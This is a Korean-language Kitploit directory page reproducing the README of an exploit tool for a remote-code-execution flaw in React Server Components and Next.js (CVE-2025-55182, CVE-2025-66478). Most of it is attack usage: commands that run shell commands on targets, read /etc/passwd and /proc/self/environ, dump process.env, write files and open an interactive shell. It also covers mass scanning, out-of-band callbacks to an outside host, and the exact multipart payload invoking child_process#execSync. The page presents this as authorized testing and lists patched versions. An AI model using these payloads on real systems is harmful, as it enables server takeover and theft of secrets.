Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-55182-Exploit-PoC-Scanner — CVE-2025-55182 및 CVE-2025-66478을 대상으로 하는 React Server Components와 Next.js용 익스플로잇 도구로, RCE 가젯, 파일 읽기/쓰기, OOB 콜백, 대화형 셸을 제공하며 승인된 보안 테스트를 위해 설계되었습니다. | Kitploit
도구/GitHubGitHub/zemarkhos/cve-2025-55182-exploit-poc-scanner
Vulnerability ScannersDynamic Analysis (Sandboxing)ExploitationWeb Application ExploitationWeb SecurityPenetration TestingCommand and ControlLearning & EducationRed Teaming
Payload Development
GitHubzemarkhos/cve-2025-55182-exploit-poc-scanner

CVE-2025-55182-Exploit-PoC-Scanner

CVE-2025-55182 및 CVE-2025-66478을 대상으로 하는 React Server Components와 Next.js용 익스플로잇 도구로, RCE 가젯, 파일 읽기/쓰기, OOB 콜백, 대화형 셸을 제공하며 승인된 보안 테스트를 위해 설계되었습니다.

저장소 보기
211310개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-55182 - React Server Components RCE 익스플로잇 v2.0

CVE-2025-55182 및 CVE-2025-66478 취약점을 React Server Components(RSC) 및 Next.js Server Actions에서 테스트하기 위한 포괄적인 보안 연구 도구입니다.

취약점 개요

속성값
CVE IDCVE-2025-55182, CVE-2025-66478
CVSS 점수10.0 (CRITICAL)
영향받는 버전React < 19.2.0, Next.js < 15.0.5
취약점 유형원격 코드 실행 (RCE)
공격 벡터네트워크

기능

  • PortSwigger 스타일의 다양한 탐지 페이로드를 사용한 취약점 스캔
  • 여러 RCE 가제트(execSync, spawnSync, vm.runInThisContext 등)
  • 블라인드 RCE 검증을 위한 OOB(out-of-band) 콜백 테스트
  • 파일 읽기/쓰기 기능
  • JavaScript 코드 실행
  • 대화형 셸 모드
  • 멀티 스레딩을 이용한 대량 스캔
  • 프록시 지원 (Burp Suite 호환)
  • JSON/텍스트 출력 형식

설치

요구 사항

pip install requests

Python 버전

  • Python 3.7 이상

빠른 시작

# 기본 취약점 확인
python3 exploit-custom.py -u https://target.com --check

# 전체 취약점 스캔 (권장)
python3 exploit-custom.py -u https://target.com --scan

# 프록시 사용 (Burp Suite)
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080

# OOB 콜백 테스트
python3 exploit-custom.py -u https://target.com --oob your-id.oastify.com

# 명령 실행
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# 대화형 셸
python3 exploit-custom.py -u https://target.com --shell

사용법

명령줄 인수

usage: exploit-custom.py [-h] (-u URL | -l URL_LIST) [-p PROXY] [-c COOKIES]
                         [-H HEADER] [-t THREADS] [--timeout TIMEOUT]
                         [--check] [--detect] [--scan] [--test-all]
                         [--oob HOST] [--cmd CMD] [--gadget GADGET]
                         [--read FILE] [--write FILE CONTENT] [--js JS]
                         [--shell] [-o OUTPUT] [-q]

대상 선택

인수설명예제
-u, --url단일 대상 URL-u https://target.com
-l, --listURL을 포함한 파일-l targets.txt

스캔 모드

인수설명
--detectNext.js/RSC 사용 여부 감지
--check빠른 취약점 확인 (수학 테스트)
--scan전체 취약점 스캔 (PortSwigger 스타일)
--test-all모든 가제트 및 탐지 페이로드 테스트

익스플로잇

인수설명예제
--cmd셸 명령 실행--cmd "id"
--gadget사용할 가제트 지정--gadget execSync
--read대상에서 파일 읽기--read /etc/passwd
--write대상에 파일 쓰기--write /tmp/test.txt "content"
--jsJavaScript 코드 실행--js "process.env"
--shell대화형 셸 시작--shell
--oobOOB 콜백 호스트--oob xyz.oastify.com

연결 옵션

인수설명예제
-p, --proxyHTTP/HTTPS 프록시-p http://127.0.0.1:8080
-c, --cookies쿠키 문자열-c "session=abc123"
-H, --header추가 헤더 (반복 가능)-H "X-Custom: value"
-t, --threads대량 스캔 스레드 수-t 20
--timeout요청 타임아웃 (초)--timeout 60

출력 옵션

인수설명
-o, --output결과를 파일로 저장 (.json 또는 .txt)
-q, --quiet배너 출력 생략

스캔 예제

단일 대상

# Next.js 및 RSC 감지
python3 exploit-custom.py -u https://target.com --detect

# 빠른 취약점 확인
python3 exploit-custom.py -u https://target.com --check

# 모든 탐지 페이로드를 사용한 전체 스캔
python3 exploit-custom.py -u https://target.com --scan

# OOB 검증을 포함한 모든 가제트 테스트
python3 exploit-custom.py -u https://target.com --test-all --oob xyz.oastify.com

대량 스캔

# 여러 대상 스캔
python3 exploit-custom.py -l targets.txt --scan -o results.json

# 스레드 수 증가
python3 exploit-custom.py -l targets.txt --scan -t 20 -o results.json

# OOB 콜백 사용
python3 exploit-custom.py -l targets.txt --oob xyz.oastify.com -o results.json

익스플로잇 예제

명령 실행

# 기본 가제트 사용 (execSync)
python3 exploit-custom.py -u https://target.com --cmd "whoami"

# 특정 가제트 사용
python3 exploit-custom.py -u https://target.com --cmd "id" --gadget spawnSync
python3 exploit-custom.py -u https://target.com --cmd "cat /etc/passwd" --gadget execFileSync

파일 작업

# 파일 읽기
python3 exploit-custom.py -u https://target.com --read /etc/passwd
python3 exploit-custom.py -u https://target.com --read /proc/self/environ

# 파일 쓰기
python3 exploit-custom.py -u https://target.com --write /tmp/pwned.txt "pwned"

JavaScript 실행

# 환경 변수 가져오기
python3 exploit-custom.py -u https://target.com --js "JSON.stringify(process.env)"

# 호스트 이름 가져오기
python3 exploit-custom.py -u https://target.com --js "require('os').hostname()"

# 디렉터리 목록
python3 exploit-custom.py -u https://target.com --js "require('fs').readdirSync('/')"

대화형 셸

python3 exploit-custom.py -u https://target.com --shell

셸 명령:

명령설명
<command>셸 명령 실행
!read <file>파일 읽기
!write <file> <content>파일 쓰기
!js <code>JavaScript 실행
!gadget <name>가제트 전환
exit셸 종료

사용 가능한 가제트

RCE 가제트

이름모듈 ID설명
execSyncchild_process#execSync직접 셸 명령 실행
execFileSyncchild_process#execFileSync바이너리 파일 실행
spawnSyncchild_process#spawnSync인수로 프로세스 실행
vm_runInThisContextvm#runInThisContext현재 컨텍스트에서 JS 실행
vm_runInNewContextvm#runInNewContext샌드박스 이스케이프로 JS 실행
vm_runInThisContext_globalvm#runInThisContextglobal.process를 통해 실행

파일 가제트

이름모듈 ID설명
fs_readFileSyncfs#readFileSync임의 파일 읽기
fs_writeFileSyncfs#writeFileSync임의 파일 쓰기

OOB 가제트

이름설명
vm_fetchfetch API를 통한 HTTP 요청 (Node 18+)
vm_httphttp 모듈을 통한 HTTP 요청

탐지 페이로드 (CVE-2025-66478)

--scan 모드는 다음 PortSwigger 스타일 탐지 페이로드를 사용합니다:

페이로드설명
property_reference콜론으로 구분된 속성 참조 ["$1:a:a"]
property_reference_v2대체 참조 ["$1:b:b"]
property_reference_constructor속성 참조를 통한 생성자 접근
property_reference_proto속성 참조를 통한 프로토 체인 접근
action_ref_vmvm#runInThisContext를 사용한 ACTION_REF
action_ref_execSyncchild_process#execSync를 사용한 ACTION_REF

OOB 콜백 방법

도구는 여러 OOB 콜백 방법을 지원합니다:

방법설명
curlcurl 명령을 통한 HTTP 요청
wgetwget 명령을 통한 HTTP 요청
nslookupDNS 쿼리
pingICMP 핑
fetchNode.js fetch API
httpNode.js http 모듈

출력 해석

터미널 색상

색상상태의미
초록색[VULN]취약함 - RCE 확인됨
노란색[PATCH]패치됨 - Server Actions가 활성화되어 있지만 보호됨
파란색[RSC]Server Actions 감지됨
청록색[NEXT]Next.js 감지됨
빨간색[ERR]연결 오류

스캔 결과

[VULN] property_reference          취약 패턴 감지!
        -> 오류 다이제스트 패턴: E{"digest"... (OOB 검증 필요)
[SAFE] property_reference_v2       HTTP 200
[500]  action_ref_vm               digest:12345

기술적 세부 사항

RSC Flight 형식

도구는 React Server Components의 "flight 형식" 응답을 파싱합니다:

0:{"a":"$@1","b":"$@2"}
1:E{"digest":"12345"}

멀티파트 페이로드 구조

------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_REF_0"

------CVE2025Boundary
Content-Disposition: form-data; name="$ACTION_0:0"

{"id":"child_process#execSync","bound":["whoami"]}
------CVE2025Boundary--

필수 HTTP 헤더

Content-Type: multipart/form-data; boundary=----CVE2025Boundary
Accept: text/x-component
Next-Action: <random-uuid>
RSC: 1
Next-Router-State-Tree: [[["",{"children":["__PAGE__",{}]},null,null,true]]

패치된 버전

React

  • 19.0.1, 19.1.2, 19.2.1

Next.js

  • 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7

사용 사례

버그 바운티

# 1. 대상 목록 준비
echo "https://app.example.com" > targets.txt
echo "https://api.example.com" >> targets.txt

# 2. 대량 스캔
python3 exploit-custom.py -l targets.txt --scan -o results.json

# 3. OOB로 확인
python3 exploit-custom.py -u https://vuln.example.com --oob your-id.oastify.com

침투 테스트

# 1. 기술 스택 감지
python3 exploit-custom.py -u https://target.com --detect

# 2. Burp로 분석
python3 exploit-custom.py -u https://target.com --scan -p http://127.0.0.1:8080
도구 다운로드